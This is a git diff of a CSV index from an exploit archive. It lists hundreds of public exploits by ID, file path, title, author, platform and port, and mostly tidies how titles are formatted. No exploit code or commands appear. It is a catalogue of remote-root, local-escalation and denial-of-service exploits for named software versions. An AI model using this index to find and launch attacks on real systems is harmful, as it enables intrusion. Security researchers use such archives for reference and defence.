diff --git a/files.csv b/files.csv index 901d1bfa3..ed21f84c6 100755 --- a/files.csv +++ b/files.csv @@ -15,8 +15,8 @@ id,file,description,date,author,platform,type,port 15,platforms/osx/local/15.c,"Mac OS X <= 10.2.4 DirectoryService (PATH) Local Root Exploit",2003-04-18,"Neeko Oni",osx,local,0 16,platforms/linux/remote/16.c,"PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 Denial of Service Exploit",2003-04-22,"Tom Ferris",windows,dos,0 -18,platforms/linux/remote/18.sh,"Snort <=1.9.1 Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 -19,platforms/linux/remote/19.c,"PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)",2003-04-25,blightninjas,linux,remote,1723 +18,platforms/linux/remote/18.sh,"Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 +19,platforms/linux/remote/19.c,"PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)",2003-04-25,blightninjas,linux,remote,1723 20,platforms/windows/remote/20.txt,"MS Windows SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 21,platforms/linux/local/21.c,"Qpopper 4.0.x poppassd Local Root Exploit",2003-04-29,Xpl017Elz,linux,local,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 Denial of Service - Proof of Concept",2003-04-29,aT4r,windows,dos,0 @@ -84,7 +84,7 @@ id,file,description,date,author,platform,type,port 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21 -89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 +89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"RĂ©mi Denis-Courmont",windows,remote,4661 91,platforms/linux/local/91.c,"Stunnel <= 3.24, 4.00 Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 @@ -121,25 +121,25 @@ id,file,description,date,author,platform,type,port 124,platforms/windows/remote/124.pl,"IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit",2003-11-20,xCrZx,linux,remote,80 -127,platforms/windows/remote/127.pl,"Opera 7.22 File Creation and Execution Exploit (Malicious Webserver)",2003-11-22,nesumin,windows,remote,0 +127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 ""do_brk()"" local Root Exploit (PoC)",2003-12-02,"Christophe Devine",linux,local,0 130,platforms/windows/remote/130.c,"MS Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 -133,platforms/windows/remote/133.pl,"Eznet v3.5.0 Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 +133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 135,platforms/windows/remote/135.c,"MS Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit",2003-12-21,RusH,php,webapps,0 -139,platforms/linux/remote/139.c,"Cyrus IMSPD v1.7 abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 -140,platforms/linux/local/140.c,"Xsok v1.02 ""-xsokdir"" local buffer overflow game exploit",2004-01-02,c0wboy,linux,local,0 +139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 +140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0 142,platforms/linux/local/142.c,"Linux Kernel ""do_mremap"" Local Proof of Concept II",2004-01-07,"Christophe Devine",linux,local,0 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0 144,platforms/linux/local/144.c,"SuSE linux 9.0 YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 145,platforms/linux/local/145.c,"Linux Kernel 2.4.x mremap() bound checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0 -146,platforms/multiple/dos/146.c,"Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)",2003-10-09,"Bram Matthys",multiple,dos,0 +146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"MS Windows XP/2003 Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21 @@ -168,7 +168,7 @@ id,file,description,date,author,platform,type,port 174,platforms/linux/remote/174.c,"Monit <= 4.2 Remote Root Buffer Overflow Exploit",2004-04-12,"Abhisek Datta",linux,remote,2812 175,platforms/windows/remote/175.pl,"eMule <= 0.42d IRC Remote Buffer Overflow Exploit",2004-04-12,Kingcope,windows,remote,0 176,platforms/windows/dos/176.c,"MS Windows IIS SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 -177,platforms/cgi/webapps/177.pl,"Poll It CGI v2.0 exploit",2000-11-15,keelis,cgi,webapps,0 +177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - exploit",2000-11-15,keelis,cgi,webapps,0 178,platforms/linux/local/178.c,"traceroute Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 Local Buffer Overflow Exploit",2000-11-15,vade79,linux,local,0 @@ -178,7 +178,7 @@ id,file,description,date,author,platform,type,port 184,platforms/linux/local/184.pl,"Restore and Dump Local Exploit",2000-11-16,Tlabs,linux,local,0 185,platforms/linux/dos/185.sh,"Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 186,platforms/linux/local/186.pl,"xsplumber - strcpy() buffer overflow",2000-11-17,vade79,linux,local,0 -187,platforms/cgi/webapps/187.pl,"ListMail v112 - Command Execution",2000-11-17,teleh0r,cgi,webapps,0 +187,platforms/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,cgi,webapps,0 188,platforms/cgi/webapps/188.pl,"UtilMind Mail List 1.7 - Users Can Execute Commands",2000-11-17,teleh0r,cgi,webapps,0 189,platforms/windows/remote/189.c,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (6)",2000-11-18,incubus,windows,remote,80 190,platforms/windows/remote/190.c,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (9)",2000-11-18,optyx,windows,remote,80 @@ -204,7 +204,7 @@ id,file,description,date,author,platform,type,port 213,platforms/solaris/remote/213.c,"Solaris sadmind Remote Buffer Overflow Exploit",2000-12-01,optyx,solaris,remote,111 214,platforms/windows/dos/214.c,"MS Windows (Jolt2.c) Denial of Service Exploit",2000-12-02,phonix,windows,dos,0 215,platforms/linux/local/215.c,"mount exploit for glibc locale bug",2000-12-02,sk8,linux,local,0 -216,platforms/linux/local/216.c,"dislocate - Local i386 exploit in v1.3",2000-12-02,"Michel Kaempf",linux,local,0 +216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0 218,platforms/linux/local/218.c,"expect (/usr/bin/expect) buffer overflow",2000-12-04,isox,linux,local,0 219,platforms/linux/local/219.c,"GnomeHack Local Buffer Overflow Exploit (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0 @@ -221,7 +221,7 @@ id,file,description,date,author,platform,type,port 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit",2000-12-19,unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 -235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 +235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513 238,platforms/linux/dos/238.c,"ml2 - local users can crash processes",2001-01-03,Stealth,linux,dos,0 @@ -236,13 +236,13 @@ id,file,description,date,author,platform,type,port 249,platforms/linux/local/249.c,"GLIBC locale format strings exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 -252,platforms/linux/local/252.pl,"Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux",2001-01-15,teleh0r,linux,local,0 -253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143 +252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0 +253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143 254,platforms/hardware/remote/254.c,"Cisco Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23 255,platforms/linux/local/255.pl,"Redhat 6.1 man Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 -258,platforms/linux/local/258.sh,"glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x",2001-01-25,krochos,linux,local,0 +258,platforms/linux/local/258.sh,"glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 (su) Env Local Stack Overflow Exploit",2001-01-26,k2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,k2,sco,local,0 @@ -265,7 +265,7 @@ id,file,description,date,author,platform,type,port 280,platforms/solaris/remote/280.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit",2001-03-02,"Cody Tubbs",tru64,local,0 282,platforms/linux/remote/282.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (4)",2001-03-02,multiple,linux,remote,53 -284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 +284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 285,platforms/linux/local/285.c,"Slackware 7.1 /usr/bin/mail Local Exploit",2001-03-03,kengz,linux,local,0 286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 ports package xklock local root exploit",2001-03-03,dethy,bsd,local,0 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 Ports Package elvrec Local Root Exploit",2001-03-03,dethy,bsd,local,0 @@ -346,7 +346,7 @@ id,file,description,date,author,platform,type,port 371,platforms/linux/dos/371.c,"Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)",2004-08-02,n/a,linux,dos,0 372,platforms/linux/remote/372.c,"OpenFTPD (<= 0.30.2) Remote Exploit",2004-08-03,andi,linux,remote,21 373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 -374,platforms/linux/local/374.c,"SoX Local Buffer Overflow Exploiter (Via Crafted WAV File)",2004-08-04,Rave,linux,local,0 +374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0 375,platforms/linux/local/375.c,"Linux Kernel File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"MS Internet Explorer Remote Null Pointer Crash (mshtml.dll)",2004-08-04,n/a,windows,dos,0 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 @@ -381,7 +381,7 @@ id,file,description,date,author,platform,type,port 408,platforms/linux/remote/408.c,"Qt BMP Parsing Bug Heap Overflow Exploit",2004-08-21,infamous41md,linux,remote,0 409,platforms/bsd/remote/409.c,"BSD (telnetd) Remote Root Exploit",2001-06-09,Teso,bsd,remote,23 411,platforms/linux/local/411.c,"Sendmail 8.11.x Exploit (i386-Linux)",2001-01-01,sd,linux,local,0 -413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer",2004-08-24,Tal0n,linux,remote,0 +413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0 417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0 418,platforms/windows/remote/418.c,"Winamp <= 5.04 Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0 @@ -481,7 +481,7 @@ id,file,description,date,author,platform,type,port 625,platforms/windows/dos/625.pl,"WinFTP Server 1.6 Denial of Service Exploit",2004-11-11,KaGra,windows,dos,0 626,platforms/windows/dos/626.c,"Kerio Personal Firewall <= 4.1.1 Multiple IP Options DoS Exploit",2004-11-12,houseofdabus,windows,dos,0 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 (DELETE) Remote Stack Overflow Exploit",2004-11-12,Zatlander,windows,remote,143 -628,platforms/windows/dos/628.c,"NetNote Server (<= 2.2 build 230) Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 +628,platforms/windows/dos/628.c,"NetNote Server <= 2.2 build 230 - Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 629,platforms/multiple/local/629.c,"Multiple AntiVirus (zip file) Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 630,platforms/php/webapps/630.pl,"UBB.threads 6.2.*-6.3.* one char bruteforce exploit",2004-11-15,RusH,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,n/a,php,webapps,0 @@ -494,11 +494,11 @@ id,file,description,date,author,platform,type,port 641,platforms/windows/remote/641.txt,"MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 643,platforms/windows/remote/643.c,"SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 -644,platforms/windows/remote/644.pl,"DMS POP3 Server (1.5.3 build 37) Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110 +644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110 645,platforms/php/webapps/645.pl,"GFHost PHP GMail Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0 647,platforms/php/webapps/647.pl,"phpBB <= 2.0.10 Remote Command Execution Exploit",2004-11-22,RusH,php,webapps,0 -648,platforms/php/webapps/648.pl,"Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit",2004-11-22,RusH,php,webapps,0 +648,platforms/php/webapps/648.pl,"Invision Power Board 2.0.0 - 2.0.2 - Sql Injection Exploit",2004-11-22,RusH,php,webapps,0 649,platforms/windows/dos/649.c,"wodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit",2004-11-22,Komrade,windows,dos,0 650,platforms/windows/remote/650.c,"CoffeeCup FTP Clients (Direct <= 6.2.0.62) (Free <= 3.0.0.10) BoF Exploit",2004-11-22,Komrade,windows,remote,0 651,platforms/windows/dos/651.c,"Halo <= 1.05 Broadcast Client Crash Exploit",2004-11-22,"Luigi Auriemma",windows,dos,0 @@ -517,18 +517,18 @@ id,file,description,date,author,platform,type,port 667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0 668,platforms/windows/remote/668.c,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code)",2004-11-30,JohnH,windows,remote,143 669,platforms/linux/local/669.c,"Aspell (word-list-compress) Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0 -670,platforms/windows/remote/670.c,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow v2 (c code)",2004-12-01,JohnH,windows,remote,143 +670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)",2004-12-01,JohnH,windows,remote,143 671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service Exploit",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed <= 1.05 Format String and Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0 673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller <= 0.6.1 Hotfix 1.4 Directory Browsing Vulnerability",2004-12-05,Mouse,windows,remote,0 -676,platforms/php/webapps/676.c,"phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit",2004-12-05,evilrabbi,php,webapps,0 +676,platforms/php/webapps/676.c,"phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight <= 5.2a Skin File (*.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 -679,platforms/windows/dos/679.c,"Battlefield 1942 <= 1.6.19 and Vietnam <= 1.2 Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 +679,platforms/windows/dos/679.c,"Battlefield 1942 <= 1.6.19 + Vietnam <= 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue Local Root Exploit",2004-12-08,"Jonathan Bringhurst",osx,local,0 681,platforms/linux/remote/681.c,"Citadel/UX <= 6.27 Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 682,platforms/windows/dos/682.c,"Codename Eagle <= 1.42 Socket Unreacheable DoS Exploit",2004-12-13,"Luigi Auriemma",windows,dos,0 -683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) Socket Unreacheable DoS",2004-12-13,"Luigi Auriemma",windows,dos,0 +683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable DoS",2004-12-13,"Luigi Auriemma",windows,dos,0 684,platforms/linux/local/684.c,"TipxD <= 1.1.1 Local Format String Vulnerability (not setuid)",2004-12-14,CoKi,linux,local,0 685,platforms/linux/dos/685.c,"Linux Kernel <= 2.4.28 and <= 2.6.9 scm_send local DoS Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 686,platforms/linux/dos/686.c,"Linux Kernel (<= 2.6.9, 2.4.22-28) (igmp.c) Local Denial of Service Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 @@ -561,7 +561,7 @@ id,file,description,date,author,platform,type,port 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,n/a,php,webapps,0 721,platforms/windows/dos/721.html,"MS Windows Kernel ANI File Parsing Crash Vulnerability",2004-12-25,Flashsky,windows,dos,0 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,n/a,php,webapps,0 -726,platforms/windows/remote/726.c,"Netcat v1.1 ""-e"" Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0 +726,platforms/windows/remote/726.c,"Netcat v1.1 - ""-e"" Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0 729,platforms/windows/remote/729.txt,"PHP <= 4.3.7 openlog() Buffer Overflow Exploit",2004-12-28,"The Warlock [BhQ]",windows,remote,80 730,platforms/windows/remote/730.html,"MS Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0 733,platforms/windows/remote/733.c,"MS Windows 2000 WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 @@ -575,8 +575,8 @@ id,file,description,date,author,platform,type,port 742,platforms/windows/dos/742.c,"Gore <= 1.50 Socket Unreacheable Denial of Service Exploit",2005-01-06,"Luigi Auriemma",windows,dos,0 743,platforms/windows/dos/743.html,"Norton Antivirus < 2005 Remote Stack Overflow Exploit",2005-01-06,"Rafel Ivgi",windows,dos,0 744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 uselib() Privilege Elevation",2005-01-07,"Paul Starzetz",linux,local,0 -745,platforms/multiple/remote/745.cgi,"Webmin Web Brute Force v1.5 (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 -746,platforms/multiple/remote/746.pl,"Webmin BruteForce + Command Execution v1.5",2005-01-08,ZzagorR,multiple,remote,10000 +745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 +746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 749,platforms/windows/local/749.cpp,"MS Windows Improper Token Validation Local Exploit (working)",2005-01-11,"Cesar Cerrudo",windows,local,0 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version)",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"MS Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,SkyLined,windows,remote,0 @@ -589,7 +589,7 @@ id,file,description,date,author,platform,type,port 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 Buffer Overflow Vulnerability",2005-01-18,"Tan Chew Keong",windows,remote,162 762,platforms/osx/dos/762.c,"Mac OS X <= 10.3.7 Input Validation Flaw parse_machfile() DoS",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey <= 0.0.2 Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 -764,platforms/linux/remote/764.c,"Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80 +764,platforms/linux/remote/764.c,"Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80 765,platforms/windows/remote/765.c,"MS Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 766,platforms/osx/local/766.c,"Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21 @@ -608,7 +608,7 @@ id,file,description,date,author,platform,type,port 782,platforms/windows/dos/782.pl,"TinyWeb 1.9 Denial of Service Exploit",2005-02-01,Karak0rsan,windows,dos,80 783,platforms/windows/dos/783.c,"Painkiller <= 1.35 in-game cd-key alpha-numeric Buffer Overflow Exploit",2005-02-02,"Luigi Auriemma",windows,dos,0 784,platforms/linux/remote/784.c,"ngIRCd <= 0.8.2 Remote Format String Exploit",2005-02-03,CoKi,linux,remote,6667 -785,platforms/linux/remote/785.c,"Newspost 2.1 socket_getline() Remote Buffer Overflow Exploit v2",2005-02-03,cybertronic,linux,remote,119 +785,platforms/linux/remote/785.c,"Newspost 2.1 - socket_getline() Remote Buffer Overflow Exploit (2)",2005-02-03,cybertronic,linux,remote,119 786,platforms/php/webapps/786.pl,"LiteForum 2.1.1 sql injection exploit",2005-02-04,RusH,php,webapps,0 787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 Remote Buffer OverflowExploit (win2003)",2005-02-04,CorryL,windows,remote,80 788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 Local Root Exploit",2005-02-05,"Charles Stevenson",linux,local,0 @@ -624,9 +624,9 @@ id,file,description,date,author,platform,type,port 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 799,platforms/osx/dos/799.c,"Mac OS X AppleFileServer Remote Denial of Service Exploit",2005-02-08,nemo,osx,dos,0 800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module Remote Exploit",2005-02-08,"ALBANIA SECURITY",php,webapps,0 -801,platforms/php/webapps/801.c,"PHP-Nuke v7.4 admin exploit (old exploit)",2005-02-09,Silentium,php,webapps,0 +801,platforms/php/webapps/801.c,"PHP-Nuke 7.4 - Admin Exploit",2005-02-09,Silentium,php,webapps,0 802,platforms/windows/remote/802.cpp,"MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit",2005-02-09,ATmaCA,windows,remote,0 -803,platforms/windows/local/803.c,"DelphiTurk FTP v1.0 Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 +803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 804,platforms/windows/remote/804.c,"MSN Messenger PNG Image Buffer Overflow (linux compile)",2005-02-09,dgr,windows,remote,0 805,platforms/multiple/remote/805.c,"ELOG <= 2.5.6 Remote Shell Exploit",2005-02-09,n4rk0tix,multiple,remote,8080 806,platforms/linux/remote/806.c,"Prozilla 